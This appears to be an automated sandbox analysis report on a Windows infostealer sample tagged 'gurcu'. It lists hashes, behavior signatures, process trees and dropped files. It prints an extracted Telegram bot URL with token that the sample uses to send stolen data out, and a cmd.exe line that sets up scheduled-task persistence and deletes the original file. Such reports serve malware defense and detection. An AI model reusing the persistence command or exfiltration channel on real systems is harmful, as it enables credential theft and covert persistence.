Resubmissions
10-04-2024 02:49
240410-da1n1sfe7v 1010-04-2024 02:49
240410-daz3gscc34 1010-04-2024 02:48
240410-dazfyscc32 1010-04-2024 02:48
240410-dayvesfe7s 1014-10-2023 03:45
231014-ea62gage69 10Analysis
-
max time kernel
288s -
max time network
304s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
10-04-2024 02:48
Behavioral task
behavioral1
Sample
B9a5797cb584014f3fede.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
B9a5797cb584014f3fede.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
B9a5797cb584014f3fede.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
B9a5797cb584014f3fede.exe
Resource
win11-20240221-en
General
-
Target
B9a5797cb584014f3fede.exe
-
Size
530KB
-
MD5
862e7aeb18ba5892f51b5712a213a614
-
SHA1
99d86e4247f52c3ea9b2bb476af66dfc7707fa8d
-
SHA256
44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31
-
SHA512
678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713
-
SSDEEP
6144:XHClm6SWPoK5Z0EwVSmRPQd/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccHd8JyO:XHCnZxb88RatpvnzZjDv7oj19yTNTY
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6176004110:AAFKA5be4dMwA848HWxzYIzrzzOGIHMOJGc/sendMessage?chat_id=615133582
Signatures
-
Executes dropped EXE 11 IoCs
pid Process 2144 B9a5797cb584014f3fede.exe 1608 tor.exe 4152 B9a5797cb584014f3fede.exe 328 tor.exe 2372 B9a5797cb584014f3fede.exe 2044 tor.exe 3284 B9a5797cb584014f3fede.exe 3860 tor.exe 3396 B9a5797cb584014f3fede.exe 888 tor.exe 2356 B9a5797cb584014f3fede.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1144 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2888 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2144 B9a5797cb584014f3fede.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4892 B9a5797cb584014f3fede.exe Token: SeDebugPrivilege 2144 B9a5797cb584014f3fede.exe Token: SeDebugPrivilege 4152 B9a5797cb584014f3fede.exe Token: SeDebugPrivilege 2372 B9a5797cb584014f3fede.exe Token: SeDebugPrivilege 3284 B9a5797cb584014f3fede.exe Token: SeDebugPrivilege 3396 B9a5797cb584014f3fede.exe Token: SeDebugPrivilege 2356 B9a5797cb584014f3fede.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4892 wrote to memory of 1908 4892 B9a5797cb584014f3fede.exe 80 PID 4892 wrote to memory of 1908 4892 B9a5797cb584014f3fede.exe 80 PID 1908 wrote to memory of 1044 1908 cmd.exe 82 PID 1908 wrote to memory of 1044 1908 cmd.exe 82 PID 1908 wrote to memory of 2888 1908 cmd.exe 83 PID 1908 wrote to memory of 2888 1908 cmd.exe 83 PID 1908 wrote to memory of 1144 1908 cmd.exe 84 PID 1908 wrote to memory of 1144 1908 cmd.exe 84 PID 1908 wrote to memory of 2144 1908 cmd.exe 85 PID 1908 wrote to memory of 2144 1908 cmd.exe 85 PID 2144 wrote to memory of 2288 2144 B9a5797cb584014f3fede.exe 87 PID 2144 wrote to memory of 2288 2144 B9a5797cb584014f3fede.exe 87 PID 2144 wrote to memory of 1608 2144 B9a5797cb584014f3fede.exe 89 PID 2144 wrote to memory of 1608 2144 B9a5797cb584014f3fede.exe 89 PID 4152 wrote to memory of 328 4152 B9a5797cb584014f3fede.exe 92 PID 4152 wrote to memory of 328 4152 B9a5797cb584014f3fede.exe 92 PID 2372 wrote to memory of 2044 2372 B9a5797cb584014f3fede.exe 98 PID 2372 wrote to memory of 2044 2372 B9a5797cb584014f3fede.exe 98 PID 3284 wrote to memory of 3860 3284 B9a5797cb584014f3fede.exe 103 PID 3284 wrote to memory of 3860 3284 B9a5797cb584014f3fede.exe 103 PID 3396 wrote to memory of 888 3396 B9a5797cb584014f3fede.exe 108 PID 3396 wrote to memory of 888 3396 B9a5797cb584014f3fede.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 B9a5797cb584014f3fede.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe"C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "B9a5797cb584014f3fede" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:1044
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2888
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "B9a5797cb584014f3fede" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:1144
-
-
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe"C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\System32\tar.exe"C:\Windows\System32\tar.exe" -xvzf "C:\Users\Admin\AppData\Local\Temp\tmp762A.tmp" -C "C:\Users\Admin\AppData\Local\gzrj1xdnai"4⤵PID:2288
-
-
C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe"C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\gzrj1xdnai\torrc.txt"4⤵
- Executes dropped EXE
PID:1608
-
-
-
-
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exeC:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe"C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\gzrj1xdnai\torrc.txt"2⤵
- Executes dropped EXE
PID:328
-
-
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exeC:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe"C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\gzrj1xdnai\torrc.txt"2⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exeC:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe1⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3284 -
C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe"C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\gzrj1xdnai\torrc.txt"2⤵
- Executes dropped EXE
PID:3860
-
-
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exeC:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe"C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\gzrj1xdnai\torrc.txt"2⤵
- Executes dropped EXE
PID:888
-
-
C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exeC:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2356 -
C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe"C:\Users\Admin\AppData\Local\gzrj1xdnai\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\gzrj1xdnai\torrc.txt"2⤵PID:1136
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
847B
MD5486ebddc86ea8b3e965d390d22283a23
SHA1eaffc047f067084867e8575c576a9ec60e094ba8
SHA25650a57273ecb794e53b0622eb841341e2643c11f53fa47356e6e754ab2268171d
SHA5120a50ba02250b38355a6f4fb94e40c61258a74031d9aea7cdf675f3e068f39ec0748ecf292aaf2f94b1963b9d66516ee79aa6c552617048e248774af0ff07189d
-
Filesize
530KB
MD5862e7aeb18ba5892f51b5712a213a614
SHA199d86e4247f52c3ea9b2bb476af66dfc7707fa8d
SHA25644eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31
SHA512678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713
-
Filesize
13.3MB
MD589d2d5811c1aff539bb355f15f3ddad0
SHA15bb3577c25b6d323d927200c48cd184a3e27c873
SHA256b630008f6d3887793d48b87091e56691e292894dd4fa100dc4a418a2f29dcc12
SHA51239e576124c54143520c5435a2ef9b24506131e13403489c0692f09b89135015d611c4988d4772f8a1e6557fa68b4667d467334461009cee8c2227dfc3e295289
-
Filesize
2.7MB
MD5a0db8a87f7b723266c8b04255da46b06
SHA14df00ea56d22d88f3d2e005ef66bad5b3ef92ebf
SHA25660b43cdce0f807f7891521f396f53def34a7d98986dbde0faa2a197189c587f3
SHA51241b8fc467d11af7ca6a42c7e94d1b8295ab3ae5d6d186b4f378e6e079440520e8324b695da1134beb2bc1697d2491edcc70c1b75ab6fc66b9c1cb2ecbcdb4a7d
-
Filesize
9.0MB
MD58f5d630aaebc2e3bdda52588fe385c3f
SHA15fc0bca6aac9a4b109b5f31716198c52a29d471d
SHA256118351def4f7524443a17ffae2017219b1e2215e50e4c40c7d257ca239ae1975
SHA51263dadb74b50459d729572b323362ed6fb623ba5def5c815a70e993108401e6c0410d9063c0fc32dcef342080646f47a22b7cd7df37e0dc33601a6ec068481a3d
-
Filesize
64B
MD5765140391a0ef343065a84e0ef6c62d7
SHA1a7cf65a73a8b4dddcf0a9850bfe43708aba70096
SHA25622267f31500eea6870feadcbc7a24195af072f601430d83401052eb5f96377ba
SHA51298f7967ae5e6f6ab101ef36f33a2873481b89bae08716e09fcf7a31c94feb42272fc5edd89a2d53c0ed394d611d245ffac554a52e853f7080f85bb4fc72f3e84
-
Filesize
4B
MD599607461cdb9c26e2bd5f31b12dcf27a
SHA1c5652b04914b88d8744be54b15f37015ffec9efd
SHA25631c784955084f7758276ccd3d8746388c63eac05414ccf1891e481f89b3f59a1
SHA512ef3ebc935c9bf2fdaffa55b2730d09ab928eba4f5a159312c82b9d389017dab73291a50afe39daef8bb3f65e085a30114b2ed7a041ed6f7f670714e64f935623
-
Filesize
7.4MB
MD588590909765350c0d70c6c34b1f31dd2
SHA1129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7
SHA25646fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82
SHA512a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192
-
Filesize
218B
MD589a32e783ba9bf7c9b6d21d7589c14dc
SHA1fe5001d2a14116d866f6b23595fbe27c2a5fd5a1
SHA256b9f48431e9d26c22b9730b4cec2295d75e9285f4e0bf80e0f55fa91dd406b186
SHA5120a2945a070d55e41f0d2fb4421235abdf3b7b1b53475dfbecc614e2806ba050f3c37e237f246fc22a596a4db501a47e1f48a490f5b88bb39fae00907273280ff